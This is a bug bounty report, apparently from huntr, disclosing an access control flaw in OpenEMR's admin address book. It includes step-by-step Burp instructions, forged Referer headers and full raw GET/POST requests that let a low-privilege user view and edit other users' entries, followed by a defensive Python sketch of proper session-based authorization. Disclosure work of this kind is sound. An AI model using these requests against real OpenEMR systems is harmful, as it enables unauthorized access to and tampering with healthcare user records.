huntr (www.huntr.dev) | drew-sec | 0D67DCB1-ACC0-4D5D-BB69-A09D1BC9FA1D
Mar 01, 2023 - 12:05 a.m.

Access Control Vulnerability in Admin Address Book

access control vulnerability, admin address book, low level user, web application, openemr, burpsuite, path, referer header, post request, csrf token, bug bounty

EPSS: 0.006 (Low), Percentile: 78.0%

Description

An access control vulnerability allows a low-level user of the web application to view and edit the Admin Address Book information of every other user.

Proof of Concept

Step 1. Log in to the OpenEMR web application as a low-level user (for example, Receptionist in the OpenEMR demo).

Step 2. Navigate to a page that causes your browser to send a new request. For example, select Patient->New/Search. Capture this request with a tool such as BurpSuite.

Step 3. Now modify the path and the Referer header of the captured request.
Change the path of the request to: GET /openemr/interface/usergroup/addrbook_edit.php?userid=6. The userid parameter selects which user's information you will view and be able to edit.

Also change the Referer header so the request looks as if it came from: /a/openemr/interface/usergroup/
If testing this in the demo web app, the Referer header will look like: Referer: https://demo.openemr.io/a/openemr/interface/usergroup/

The final request should look like this:

GET /openemr/interface/usergroup/addrbook_edit.php?userid=6 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://demo.openemr.io/a/openemr/interface/usergroup/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Step 4. Send the modified request. The response displays the selected user's existing address book information and lets you edit it. Make a change to this information to test your ability to edit it, click the Save button, and capture the resulting request with Burp.

Step 5. The path and Referer header of the captured request will be incorrect. Modify them the same way as in step 3 (this time it is a POST request rather than a GET). The request should look like this:

POST /openemr/interface/usergroup/addrbook_edit.php?userid=6 HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=(...Redacted...)
User-Agent: (...Redacted...)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 648
Origin: https://demo.openemr.io
Dnt: 1
Referer: https://demo.openemr.io/a/openemr/interface/usergroup/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

csrf_token_form=7478f62092304859880f40f03b458372ff3364c1&form_title=&form_lname=Lee&form_fname=Donna&form_mname=&form_suffix=&form_specialty=&form_organization=&form_director_title=&form_director_lname=Lee&form_director_fname=Donna&form_director_mname=&form_director_suffix=&form_valedictory=&form_phone=&form_phonecell=&form_phonew1=&form_phonew2=&form_fax=&form_assistant=&form_email=&form_email_direct=&form_url=&form_street=123+Sunshine+Ave&form_streetb=&form_city=&form_state=&form_zip=&form_street2=&form_streetb2=&form_city2=&form_state2=&form_zip2=&form_upin=&form_npi=&form_federaltaxid=&form_taxonomy=207Q00000X&form_notes=&form_save=Save

Step 6. Now log in to an administrator account and view the address book. The test change made with the low-level account will have taken effect.
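The missing server-side check, as an added example that is not part of this report or of OpenEMR's code: it parses a constructed copy of the spoofed GET from step 3, shows that a gate keyed on the Referer header accepts it (the header is attacker-controlled, as the PoC demonstrates), and then decides access from the authenticated session instead. The session dictionary, the role names and the "own entry only" policy for non-administrators are assumptions for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed copy of the PoC request head (cookie and User-Agent redacted on the page).
SPOOFED_REQUEST = (
    "GET /openemr/interface/usergroup/addrbook_edit.php?userid=6 HTTP/1.1\r\n"
    "Host: demo.openemr.io\r\n"
    "Referer: https://demo.openemr.io/a/openemr/interface/usergroup/\r\n"
    "Sec-Fetch-Site: same-origin\r\n"
    "\r\n"
)


def parse_request(raw):
    """Return (path, query dict, lower-cased header dict) for a raw HTTP request head."""
    request_line, _, header_block = raw.partition("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in header_block.split("\r\n"):
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return parts.path, parse_qs(parts.query), headers


def referer_gate(headers):
    """A check based on where the request claims to come from.
    Anyone can satisfy it by editing one header, exactly as step 3 does."""
    return headers.get("referer", "").endswith("/interface/usergroup/")


def authorize_addrbook_edit(session, query):
    """Decide from the server-side session only; nothing the client sends is trusted.
    `session` is a constructed stand-in for the server's session store
    (assumed shape: {"user_id": int, "role": str})."""
    target = query.get("userid", [None])[0]
    if target is None or not target.isdigit():
        return False  # malformed or missing target: fail closed
    if session["role"] == "administrator":
        return True
    # Hypothetical policy: non-administrators may only touch their own entry.
    return int(target) == session["user_id"]


def evaluate(raw, session):
    """Apply both checks to a raw request so the difference is visible."""
    _path, query, headers = parse_request(raw)
    return {"referer_gate": referer_gate(headers),
            "authorized": authorize_addrbook_edit(session, query)}
```

Run against the spoofed request, the Referer gate passes but a Receptionist session that is not user 6 is denied, which is the decision the vulnerable endpoint should have made.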
